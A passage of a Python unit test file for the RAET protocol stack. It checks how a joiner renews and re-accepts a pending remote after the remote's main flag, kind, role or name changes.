# to do this we manually step through the transactions
console.terse("\n Rejoin Failed with nack Renew Transaction **************\n")
beta.join(uid=betaRemoteAlpha.uid) #join
beta.serviceOneAllTx()
self.store.advanceStamp(0.05)
time.sleep(0.05)
alpha.serviceOneAllRx()
alpha.serviceOneAllTx() # Ack Renew
self.store.advanceStamp(0.05)
time.sleep(0.05)
# Close down alpha stack
alpha.server.close()
alpha.clearAllKeeps()
# now create new Joinent stack with new name but same role
gamma, gammaData = self.bootstrapStack(name='gamma',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role='alpha',
sigkey=alpha.local.signer.keyhex,
prikey=alpha.local.priver.keyhex,
kind=None,
mutable=True, )
self.assertEqual(gamma.name, 'gamma')
self.assertEqual(gamma.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(gamma.local.ha, ('127.0.0.1', raeting.RAET_PORT))
self.assertEqual(gamma.local.role, 'alpha')
self.assertEqual(gamma.local.signer.keyhex, alpha.local.signer.keyhex)
self.assertEqual(gamma.local.priver.keyhex, alpha.local.priver.keyhex)
# now allow socket to send packet resume transaction
console.terse("\n Renew Rejoin Transaction **************\n")
self.serviceStacks([beta, gamma])
# Action: Pend, Dump
self.assertIn('joiner_rx_renew', beta.stats)
self.assertEqual(beta.stats['joiner_rx_renew'], 1)
self.assertIn('join_renew_attempt', beta.stats)
self.assertEqual(beta.stats['join_renew_attempt'], 1)
self.assertIn('joinent_rx_pend', gamma.stats)
self.assertEqual(gamma.stats['joinent_rx_pend'], 2)
for stack in [gamma, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
gammaRemoteBeta = gamma.remotes.values()[0]
self.assertIs(gammaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, True)
betaRemoteGamma = beta.remotes.values()[0]
self.assertIs(betaRemoteAlpha, betaRemoteGamma) # same remote on beta side
self.assertFalse(self.sameAll(betaRemoteGamma, betaRemoteAlphaSave))
self.assertTrue(self.sameRoleKeys(betaRemoteGamma, betaRemoteAlphaSave))
self.assertEqual(betaRemoteGamma.name, gamma.name)
self.assertIs(betaRemoteGamma.acceptance, raeting.Acceptance.pending.value)
# Check remote dump with pended data
remoteData = beta.keep.loadRemoteData(gamma.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['name'], gamma.name) # new name value
self.assertEqual(remoteData['fuid'], gammaRemoteBeta.nuid) # new value
self.assertEqual(remoteData['role'], gamma.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), gamma.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), gamma.local.priver.pubhex)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(gamma.local.role)
self.assertEqual(roleData['role'], gamma.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), gamma.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), gamma.local.priver.pubhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemoteAlpha)
self.serviceStacks([gamma, beta], duration=3.0)
for stack in [gamma, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(beta.mutable)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
self.assertEqual(betaRemoteGamma.name, gamma.name) # new name value
self.assertIn('join_correspond_complete', gamma.stats)
self.assertEqual(gamma.stats['join_correspond_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(gamma.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemoteGamma, remoteData))
self.assertIs(remoteData['main'], True) # new main value
self.assertIs(remoteData['fuid'], gammaRemoteBeta.uid) # value
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(gamma.local.role)
self.assertEqual(roleData['role'], gamma.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), gamma.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), gamma.local.priver.pubhex)
for stack in [gamma, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousPendingPendNewMain(self):
'''
Test mutable joiner pend pending vacuous renewal join with updated main (F2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousPendingPendNewMain.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup rejoin with renew
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
self.assertIs(alphaRemoteBeta.main, False)
betaRemoteAlpha = beta.remotes.values()[0]
self.assertIs(betaRemoteAlpha.main, True)
# now set the alpha.main to False and rejoin as the initial condition
alpha.main = False
self.assertIs(alpha.main, False)
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
betaRemoteAlpha = beta.remotes.values()[0]
self.assertIs(betaRemoteAlpha.main, False)
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
# move alpha stack remote for beta to different uid (nuid) to force renew
oldUid = alphaRemoteBeta.uid
alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
# Status: Pending
beta.keep.pendRemote(betaRemoteAlpha)
self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
beta.keep.auto = raeting.AutoMode.never.value
self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
# Name: Either
# Main: New # old value was False now we change to True
oldMain = alpha.main
alpha.main = True
self.assertIs(alpha.main, True)
self.assertNotEqual(alpha.main, oldMain)
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
self.assertIs(beta.mutable, True)
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
beta.clearStats()
alpha.clearStats()
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
# Action: Pend, Dump
self.assertIn('joiner_rx_renew', beta.stats)
self.assertEqual(beta.stats['joiner_rx_renew'], 1)
self.assertIn('join_renew_attempt', beta.stats)
self.assertEqual(beta.stats['join_renew_attempt'], 1)
self.assertIn('stale_nuid', alpha.stats)
self.assertEqual(alpha.stats['stale_nuid'], 1)
self.assertIn('joinent_rx_pend', alpha.stats)
self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(beta.mutable, True)
self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertTrue(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertEqual(betaRemoteAlpha.main, alpha.main)
self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
# Check remote dump with pended data
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['main'], alpha.main) # new main value
self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
self.assertEqual(remoteData['role'], alpha.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemoteAlpha)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(beta.mutable)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
self.assertIs(betaRemoteAlpha.main, alpha.main) # new main value
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemoteAlpha, remoteData))
self.assertIs(remoteData['main'], True) # new main value
self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousPendingPendNewKind(self):
'''
Test mutable joiner pend pending vacuous renewal join with updated kind (F3)
'''
console.terse("{0}\n".format(self.testJoinerVacuousPendingPendNewKind.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup rejoin with renew
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
self.assertIs(alphaRemoteBeta.kind, 0)
betaRemoteAlpha = beta.remotes.values()[0]
self.assertIs(betaRemoteAlpha.kind, 0)
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
# move alpha stack remote for beta to different uid (nuid) to force renew
oldUid = alphaRemoteBeta.uid
alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
# Status: Pending
beta.keep.pendRemote(betaRemoteAlpha)
self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
beta.keep.auto = raeting.AutoMode.never.value
self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
# Name: Either
# Main: Either
# Kind: New # old value was None (0) now we change to 3
oldKind = alpha.kind
alpha.kind = 3
self.assertIs(alpha.kind, 3)
self.assertNotEqual(alpha.kind, oldKind)
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
self.assertIs(beta.mutable, True)
beta.clearStats()
alpha.clearStats()
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
# Action: Pend, Dump
self.assertIn('joiner_rx_renew', beta.stats)
self.assertEqual(beta.stats['joiner_rx_renew'], 1)
self.assertIn('join_renew_attempt', beta.stats)
self.assertEqual(beta.stats['join_renew_attempt'], 1)
self.assertIn('stale_nuid', alpha.stats)
self.assertEqual(alpha.stats['stale_nuid'], 1)
self.assertIn('joinent_rx_pend', alpha.stats)
self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(beta.mutable, True)
self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertTrue(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertEqual(betaRemoteAlpha.kind, alpha.kind)
self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
# Check remote dump with pended data
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['kind'], alpha.kind) # new kind value
self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
self.assertEqual(remoteData['role'], alpha.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemoteAlpha)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(beta.mutable)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
self.assertIs(betaRemoteAlpha.kind, alpha.kind) # new kind value
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemoteAlpha, remoteData))
self.assertIs(remoteData['kind'], 3) # new main value
self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousPendingPendNewRole(self):
'''
Test mutable joiner pend pending vacuous renewal join with updated role (F4)
'''
console.terse("{0}\n".format(self.testJoinerVacuousPendingPendNewRole.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup rejoin with renew
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
self.assertEqual(alphaRemoteBeta.role, 'beta')
betaRemoteAlpha = beta.remotes.values()[0]
self.assertEqual(betaRemoteAlpha.role, 'alpha')
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
# move alpha stack remote for beta to different uid (nuid) to force renew
oldUid = alphaRemoteBeta.uid
alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
# Status: Pending
beta.keep.pendRemote(betaRemoteAlpha)
self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
beta.keep.auto = raeting.AutoMode.never.value
self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
# Name: Either
# Main: Old
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: New
oldRole = alpha.local.role
alpha.local.role = 'alpha_new'
self.assertIs(alpha.local.role, 'alpha_new')
self.assertNotEqual(alpha.local.role, oldRole)
alpha.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
self.assertIs(beta.mutable, True)
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
beta.clearStats()
alpha.clearStats()
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
# Action: Pend, Dump
self.assertIn('joiner_rx_renew', beta.stats)
self.assertEqual(beta.stats['joiner_rx_renew'], 1)
self.assertIn('join_renew_attempt', beta.stats)
self.assertEqual(beta.stats['join_renew_attempt'], 1)
self.assertIn('stale_nuid', alpha.stats)
self.assertEqual(alpha.stats['stale_nuid'], 1)
self.assertIn('joinent_rx_pend', alpha.stats)
self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(beta.mutable, True)
self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertFalse(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertEqual(betaRemoteAlpha.role, alpha.local.role)
self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
# Check remote dump with pended data
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
self.assertEqual(remoteData['role'], alpha.local.role) # new value
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role) # new value
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemoteAlpha)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(beta.mutable)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
self.assertEqual(betaRemoteAlpha.role, alpha.local.role) # new role value
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemoteAlpha, remoteData))
self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
self.assertEqual(remoteData['role'], 'alpha_new') # new role value
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousPendingPendSameAll(self):
'''
Test mutable joiner pend pending vacuous renewal join with same all (G1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousPendingPendSameAll.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup rejoin with renew
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
betaRemoteAlpha = beta.remotes.values()[0]
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
# move alpha stack remote for beta to different uid (nuid) to force renew
oldUid = alphaRemoteBeta.uid
alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
# Status: Pending
beta.keep.pendRemote(betaRemoteAlpha)
self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
beta.keep.auto = raeting.AutoMode.never.value
self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: Old
# Sameness: Sameall
# Mutable: Either
self.assertIs(beta.mutable, True)
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
beta.clearStats()
alpha.clearStats()
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
# Action: Pend, Dump
self.assertIn('joiner_rx_renew', beta.stats)
self.assertEqual(beta.stats['joiner_rx_renew'], 1)
self.assertIn('join_renew_attempt', beta.stats)
self.assertEqual(beta.stats['join_renew_attempt'], 1)
self.assertIn('stale_nuid', alpha.stats)
self.assertEqual(alpha.stats['stale_nuid'], 1)
self.assertIn('joinent_rx_pend', alpha.stats)
self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(beta.mutable, True)
self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertTrue(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertEqual(betaRemoteAlpha.fuid, alphaRemoteBeta.nuid)
self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
# Check remote dump with pended data
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
self.assertEqual(remoteData['role'], alpha.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
# Check role/keys dump
